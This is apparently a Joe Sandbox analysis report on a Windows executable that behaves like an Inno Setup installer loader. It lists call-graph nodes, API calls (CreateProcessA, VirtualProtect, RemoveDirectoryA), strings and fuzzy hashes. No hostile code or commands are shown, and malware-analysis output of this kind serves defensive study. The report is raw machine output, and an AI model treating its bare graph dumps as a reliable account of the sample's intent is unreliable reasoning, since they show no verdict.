5523 40217e 5516->5523 5518 401918 4 API calls 5517->5518 5518->5516 5519->5522 5520 4021c1 5524 4022e3 RtlLeaveCriticalSection 5520->5524 5525 4022ed 5520->5525 5521 402244 5521->5523 5526 401d80 7 API calls 5521->5526 5522->5520 5522->5521 5527 402270 5522->5527 5523->5479 5524->5525 5525->5479 5526->5523 5527->5520 5528 401d00 7 API calls 5527->5528 5528->5520 5530 40215c 9 API calls 5529->5530 5531 401b95 5530->5531 5531->5489 5533 401d89 5532->5533 5535 401d92 5532->5535 5534 401b74 9 API calls 5533->5534 5533->5535 5534->5535 5535->5492 5537 401d4e 5536->5537 5538 401d1e 5536->5538 5537->5538 5545 401c68 5537->5545 5538->5489 5600 401768 5540->5600 5542 401e99 5544 401ea6 5542->5544 5611 401dcc 5542->5611 5544->5492 5546 401c7a 5545->5546 5547 401c9d 5546->5547 5548 401caf 5546->5548 5558 40188c 5547->5558 5549 40188c 3 API calls 5548->5549 5551 401cad 5549->5551 5552 401cc5 5551->5552 5568 401b44 5551->5568 5552->5538 5554 401cd4 5555 401cee 5554->5555 5573 401b98 5554->5573 5578 4013a0 5555->5578 5559 4018b2 5558->5559 5560 40190b 5558->5560 5582 401658 5559->5582 5560->5551 5565 4018e6 5565->5560 5567 4013a0 LocalAlloc 5565->5567 5567->5560 5569 401b61 5568->5569 5570 401b52 5568->5570 5569->5554 5571 401d00 9 API calls 5570->5571 5572 401b5f 5571->5572 5572->5554 5574 401bab 5573->5574 5575 401b9d 5573->5575 5574->5555 5576 401b74 9 API calls 5575->5576 5577 401baa 5576->5577 5577->5555 5579 4013ab 5578->5579 5580 4013c6 5579->5580 5581 4012e4 LocalAlloc 5579->5581 5580->5552 5581->5580 5584 40168f 5582->5584 5583 4016cf 5586 40132c 5583->5586 5584->5583 5585 4016a9 VirtualFree 5584->5585 5585->5584 5587 401348 5586->5587 5594 4012e4 5587->5594 5590 40150c 5593 40153b 5590->5593 5591 401594 5591->5565 5592 401568 VirtualFree 5592->5593 5593->5591 5593->5592 5597 40128c 5594->5597 5598 401298 LocalAlloc 5597->5598 5599 4012aa 5597->5599 5598->5599 5599->5565 5599->5590 5601 401787 5600->5601 5602 40183b 5601->5602 5603 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5601->5603 5605 40132c LocalAlloc 5601->5605 5606 401821 5601->5606 5608 4017d6 5601->5608 5609 4017e7 5602->5609 5618 4015c4 5602->5618 5603->5601 5605->5601 5607 40150c VirtualFree 5606->5607 5607->5609 5610 40150c VirtualFree 5608->5610 5609->5542 5610->5609 5612 401d80 9 API calls 5611->5612 5613 401de0 5612->5613 5614 40132c LocalAlloc 5613->5614 5616 401df0 5614->5616 5615 401df8 5615->5544 5616->5615 5617 401b44 9 API calls 5616->5617 5617->5615 5619 40160a 5618->5619 5620 401626 VirtualAlloc 5619->5620 5621 40163a 5619->5621 5620->5619 5620->5621 5621->5609 5624 401ef0 5622->5624 5623 401f1c 5625 401d00 9 API calls 5623->5625 5627 401f40 5623->5627 5624->5623 5624->5627 5628 401e58 5624->5628 5625->5627 5627->5505 5627->5506 5633 4016d8 5628->5633 5631 401e75 5631->5624 5632 401dcc 9 API calls 5632->5631 5637 4016f4 5633->5637 5634 4016fe 5636 4015c4 VirtualAlloc 5634->5636 5641 40170a 5636->5641 5637->5634 5638 40175b 5637->5638 5639 40132c LocalAlloc 5637->5639 5640 40174f 5637->5640 5643 401430 5637->5643 5638->5631 5638->5632 5639->5637 5642 40150c VirtualFree 5640->5642 5641->5638 5642->5638 5644 40143f VirtualAlloc 5643->5644 5646 40146c 5644->5646 5647 40148f 5644->5647 5648 4012e4 LocalAlloc 5646->5648 5647->5637 5649 401478 5648->5649 5649->5647 5650 40147c VirtualFree 5649->5650 5650->5647 6491 4028d2 6492 4028da 6491->6492 6493 403554 4 API calls 6492->6493 6494 4028ef 6492->6494 6493->6492 6495 4025ac 4 API calls 6494->6495 6496 4028f4 6495->6496 6816 4019d3 6817 4019ba 6816->6817 6818 4019c3 RtlLeaveCriticalSection 6817->6818 6819 4019cd 6817->6819 6818->6819 6038 407fd4 6039 407fe6 6038->6039 6040 407fed 6038->6040 6049 407f10 6039->6049 6042 408021 6040->6042 6043 408015 6040->6043 6044 408017 6040->6044 6045 40804e 6042->6045 6047 407d7c 19 API calls 6042->6047 6063 407e2c 6043->6063 6060 407d7c 6044->6060 6047->6045 6050 407f25 6049->6050 6051 407d7c 19 API calls 6050->6051 6052 407f34 6050->6052 6051->6052 6053 407f6e 6052->6053 6054 407d7c 19 API calls 6052->6054 6055 407f82 6053->6055 6056 407d7c 19 API calls 6053->6056 6054->6053 6059 407fae 6055->6059 6070 407eb8 6055->6070 6056->6055 6059->6040 6073 4058b4 6060->6073 6062 407d9e 6062->6042 6064 405184 19 API calls 6063->6064 6065 407e57 6064->6065 6081 407de4 6065->6081 6067 407e5f 6068 403198 4 API calls 6067->6068 6069 407e74 6068->6069 6069->6042 6071 407ec7 VirtualFree 6070->6071 6072 407ed9 VirtualAlloc 6070->6072 6071->6072 6072->6059 6074 4058c0 6073->6074 6075 405184 19 API calls 6074->6075 6076 4058ed 6075->6076 6077 4031e8 4 API calls 6076->6077 6078 4058f8 6077->6078 6079 403198 4 API calls 6078->6079 6080 40590d 6079->6080 6080->6062 6082 4058b4 19 API calls 6081->6082 6083 407e06 6082->6083 6083->6067 6501 40a0d5 6502 40a105 6501->6502 6503 40a10f CreateWindowExA SetWindowLongA 6502->6503 6504 405184 19 API calls 6503->6504 6505 40a192 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1a0 6506->6507 6508 4032fc 4 API calls 6507->6508 6509 40a1ad 6508->6509 6510 406b7c 5 API calls 6509->6510 6511 40a1b9 6510->6511 6512 4032fc 4 API calls 6511->6512 6513 40a1c2 6512->6513 6514 4099a4 29 API calls 6513->6514 6515 40a1d4 6514->6515 6516 409884 5 API calls 6515->6516 6517 40a1e7 6515->6517 6516->6517 6518 40a220 6517->6518 6519 4094d8 9 API calls 6517->6519 6520 40a239 6518->6520 6523 40a233 RemoveDirectoryA 6518->6523 6519->6518 6521 40a242 74285CF0 6520->6521 6522 40a24d 6520->6522 6521->6522 6524 40a275 6522->6524 6525 40357c 4 API calls 6522->6525 6523->6520 6526 40a26b 6525->6526 6527 4025ac 4 API calls 6526->6527 6527->6524 6086 40a0e7 6087 40a0eb SetLastError 6086->6087 6118 409648 GetLastError 6087->6118 6090 40a105 6092 40a10f CreateWindowExA SetWindowLongA 6090->6092 6091 402f24 5 API calls 6091->6090 6093 405184 19 API calls 6092->6093 6094 40a192 6093->6094 6095 4032fc 4 API calls 6094->6095 6096 40a1a0 6095->6096 6097 4032fc 4 API calls 6096->6097 6098 40a1ad 6097->6098 6131 406b7c GetCommandLineA 6098->6131 6101 4032fc 4 API calls 6102 40a1c2 6101->6102 6136 4099a4 6102->6136 6105 409884 5 API calls 6106 40a1e7 6105->6106 6107 40a220 6106->6107 6108 40a207 6106->6108 6110 40a239 6107->6110 6113 40a233 RemoveDirectoryA 6107->6113 6152 4094d8 6108->6152 6111 40a242 74285CF0 6110->6111 6112 40a24d 6110->6112 6111->6112 6114 40a275 6112->6114 6160 40357c 6112->6160 6113->6110 6116 40a26b 6117 4025ac 4 API calls 6116->6117 6117->6114 6119 404c84 19 API calls 6118->6119 6120 40968f 6119->6120 6121 407284 5 API calls 6120->6121 6122 40969f 6121->6122 6123 408da8 4 API calls 6122->6123 6124 4096b4 6123->6124 6125 405880 4 API calls 6124->6125 6126 4096c3 6125->6126 6127 4031b8 4 API calls 6126->6127 6128 4096e2 6127->6128 6129 403198 4 API calls 6128->6129 6130 4096ea 6129->6130 6130->6090 6130->6091 6132 406af0 4 API calls 6131->6132 6133 406ba1 6132->6133 6134 403198 4 API calls 6133->6134 6135 406bbf 6134->6135 6135->6101 6137 4033b4 4 API calls 6136->6137 6138 4099df 6137->6138 6139 409a11 CreateProcessA 6138->6139 6140 409a24 CloseHandle 6139->6140 6141 409a1d 6139->6141 6143 409a2d 6140->6143 6142 409648 21 API calls 6141->6142 6142->6140 6173 409978 6143->6173 6146 409a49 6147 409978 3 API calls 6146->6147 6148 409a4e GetExitCodeProcess CloseHandle 6147->6148 6149 409a6e 6148->6149 6150 403198 4 API calls 6149->6150 6151 409a76 6150->6151 6151->6105 6151->6106 6153 409532 6152->6153 6157 4094eb 6152->6157 6153->6107 6154 4094f3 Sleep 6154->6157 6155 409503 Sleep 6155->6157 6157->6153 6157->6154 6157->6155 6158 40951a GetLastError 6157->6158 6177 408fbc 6157->6177 6158->6153 6159 409524 GetLastError 6158->6159 6159->6153 6159->6157 6161 403591 6160->6161 6162 4035a0 6160->6162 6167 4035d0 6161->6167 6168 40359b 6161->6168 6169 4035b6 6161->6169 6163 4035b1 6162->6163 6164 4035b8 6162->6164 6165 403198 4 API calls 6163->6165 6166 4031b8 4 API calls 6164->6166 6165->6169 6166->6169 6167->6169 6171 40357c 4 API calls 6167->6171 6168->6162 6170 4035ec 6168->6170 6169->6116 6170->6169 6185 403554 6170->6185 6171->6167 6174 40998c PeekMessageA 6173->6174 6175 409980 TranslateMessage DispatchMessageA 6174->6175 6176 40999e MsgWaitForMultipleObjects 6174->6176 6175->6174 6176->6143 6176->6146 6178 408f70 2 API calls 6177->6178 6180 408fd2 6178->6180 6179 408fd6 6179->6157 6180->6179 6181 408ff2 DeleteFileA GetLastError 6180->6181 6182 409010 6181->6182 6183 408fac Wow64RevertWow64FsRedirection 6182->6183 6184 409018 6183->6184 6184->6157 6187 403566 6185->6187 6188 403578 6187->6188 6189 403604 6187->6189 6188->6170 6190 40357c 6189->6190 6191 4035a0 6190->6191 6196 4035d0 6190->6196 6197 40359b 6190->6197 6198 4035b6 6190->6198 6192 4035b1 6191->6192 6193 4035b8 6191->6193 6194 403198 4 API calls 6192->6194 6195 4031b8 4 API calls 6193->6195 6194->6198 6195->6198 6196->6198 6200 40357c 4 API calls 6196->6200 6197->6191 6199 4035ec 6197->6199 6198->6187 6199->6198 6201 403554 4 API calls 6199->6201 6200->6196 6201->6199 6823 402be9 RaiseException 6824 402c04 6823->6824 6534 402af2 6535 402afe 6534->6535 6538 402ed0 6535->6538 6539 403154 4 API calls 6538->6539 6540 402ee0 6539->6540 6541 402b03 6540->6541 6543 402b0c 6540->6543 6544 402b25 6543->6544 6545 402b15 RaiseException 6543->6545 6544->6541 6545->6544 6825 402dfa 6826 402e26 6825->6826 6827 402e0d 6825->6827 6829 402ba4 6827->6829 6830 402bc9 6829->6830 6831 402bad 6829->6831 6830->6826 6832 402bb5 RaiseException 6831->6832 6832->6830 6833 4075fa GetFileSize 6834 407626 6833->6834 6835 407616 GetLastError 6833->6835 6835->6834 6836 40761f 6835->6836 6837 40748c 21 API calls 6836->6837 6837->6834 6838 406ffb 6839 407008 SetErrorMode 6838->6839 6550 403a80 CloseHandle 6551 403a90 6550->6551 6552 403a91 GetLastError 6550->6552 6553 40a282 6555 40a1f4 6553->6555 6554 40a220 6557 40a239 6554->6557 6560 40a233 RemoveDirectoryA 6554->6560 6555->6554 6556 4094d8 9 API calls 6555->6556 6556->6554 6558 40a242 74285CF0 6557->6558 6559 40a24d 6557->6559 6558->6559 6561 40a275 6559->6561 6562 40357c 4 API calls 6559->6562 6560->6557 6563 40a26b 6562->6563 6564 4025ac 4 API calls 6563->6564 6564->6561 6565 404283 6566 4042c3 6565->6566 6567 403154 4 API calls 6566->6567 6568 404323 6567->6568 6840 404185 6841 4041ff 6840->6841 6842 4041cc 6841->6842 6843 403154 4 API calls 6841->6843 6844 404323 6843->6844 6569 40a287 6570 40a290 6569->6570 6572 40a2bb 6569->6572 6579 409448 6570->6579 6573 403198 4 API calls 6572->6573 6575 40a2f3 6573->6575 6574 40a295 6574->6572 6577 40a2b3 MessageBoxA 6574->6577 6576 403198 4 API calls 6575->6576 6578 40a2fb 6576->6578 6577->6572 6580 409454 GetCurrentProcess OpenProcessToken 6579->6580 6581 4094af ExitWindowsEx 6579->6581 6582 409466 6580->6582 6583 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6580->6583 6581->6582 6582->6574 6583->6581 6583->6582 6584 403e87 6585 403e4c 6584->6585 6586 403e67 6585->6586 6587 403e62 6585->6587 6588 403e7b 6585->6588 6591 403e78 6586->6591 6597 402674 6586->6597 6593 403cc8 6587->6593 6590 402674 4 API calls 6588->6590 6590->6591 6594 403cd6 6593->6594 6595 402674 4 API calls 6594->6595 6596 403ceb 6594->6596 6595->6596 6596->6586 6598 403154 4 API calls 6597->6598 6599 40267a 6598->6599 6599->6591 6604 407e90 6605 407eb8 VirtualFree 6604->6605 6606 407e9d 6605->6606 6853 403991 6854 403983 6853->6854 6855 40374c VariantClear 6854->6855 6856 40398b 6855->6856 6857 405b92 6859 405b94 6857->6859 6858 405bd0 6862 405930 5 API calls 6858->6862 6859->6858 6860 405be7 6859->6860 6861 405bca 6859->6861 6866 404ccc 5 API calls 6860->6866 6861->6858 6863 405c3c 6861->6863 6864 405be3 6862->6864 6865 4059a0 19 API calls 6863->6865 6867 403198 4 API calls 6864->6867 6865->6864 6868 405c10 6866->6868 6869 405c76 6867->6869 6870 4059a0 19 API calls 6868->6870 6870->6864 6609 403e95 6610 403e4c 6609->6610 6611 403e62 6610->6611 6612 403e7b 6610->6612 6614 403e67 6610->6614 6613 403cc8 4 API calls 6611->6613 6615 402674 4 API calls 6612->6615 6613->6614 6616 403e78 6614->6616 6617 402674 4 API calls 6614->6617 6615->6616 6617->6616 6618 403a97 6619 403aac 6618->6619 6620 403bbc GetStdHandle 6619->6620 6621 403b0e CreateFileA 6619->6621 6631 403ab2 6619->6631 6622 403c17 GetLastError 6620->6622 6626 403bba 6620->6626 6621->6622 6623 403b2c 6621->6623 6622->6631 6625 403b3b GetFileSize 6623->6625 6623->6626 6625->6622 6627 403b4e SetFilePointer 6625->6627 6628 403be7 GetFileType 6626->6628 6626->6631 6627->6622 6632 403b6a ReadFile 6627->6632 6630 403c02 CloseHandle 6628->6630 6628->6631 6630->6631 6632->6622 6633 403b8c 6632->6633 6633->6626 6634 403b9f SetFilePointer 6633->6634 6634->6622 6635 403bb0 SetEndOfFile 6634->6635 6635->6622 6635->6626 6889 4011aa 6890 4011ac GetStdHandle 6889->6890 6228 4076ac SetEndOfFile 6229 4076c3 6228->6229 6230 4076bc 6228->6230 6231 40748c 21 API calls 6230->6231 6231->6229 6639 4028ac 6640 402594 4 API calls 6639->6640 6641 4028b6 6640->6641 6642 401ab9 6643 401a96 6642->6643 6644 401aa9 RtlDeleteCriticalSection 6643->6644 6645 401a9f RtlLeaveCriticalSection 6643->6645 6645->6644

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 133 409bb3-409bc0 VirtualProtect 132->133 133->121
                                                                            APIs
                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                            • String ID:
                                                                            • API String ID: 2441996862-0
                                                                            • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                            • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                            • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                            • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                            • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                            • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                            • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                            • API String ID: 3256987805-3653653586
                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetLastError.KERNEL32 ref: 0040A0F4
                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021015C0), ref: 0040966C
                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                            • SetWindowLongA.USER32(00010408,000000FC,00409918), ref: 0040A148
                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                            • 74285CF0.USER32(00010408,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastWindow$74285CreateDirectoryLongRemove
                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                            • API String ID: 1551400771-3001827809
                                                                            • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                            • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                            • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                            • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                            • API String ID: 1646373207-2130885113
                                                                            • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                            • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                            • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                            • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                            • SetWindowLongA.USER32(00010408,000000FC,00409918), ref: 0040A148
                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                              • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021015C0,00409A90,00000000,00409A77), ref: 00409A14
                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021015C0,00409A90,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                              • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021015C0,00409A90), ref: 00409A5C
                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                            • 74285CF0.USER32(00010408,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcessWindow$74285CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                            • API String ID: 2264470932-3001827809
                                                                            • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                            • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                            • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                            • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021015C0,00409A90,00000000,00409A77), ref: 00409A14
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021015C0,00409A90,00000000), ref: 00409A28
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,021015C0,00409A90), ref: 00409A5C
                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,021015C0), ref: 0040966C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2560631440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2560537893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560686168.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2560895253.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                            • String ID: D
                                                                            • API String ID: 3356880605-2746444292
                                                                            • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                            • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                            • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                            • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                            Control-flow Graph

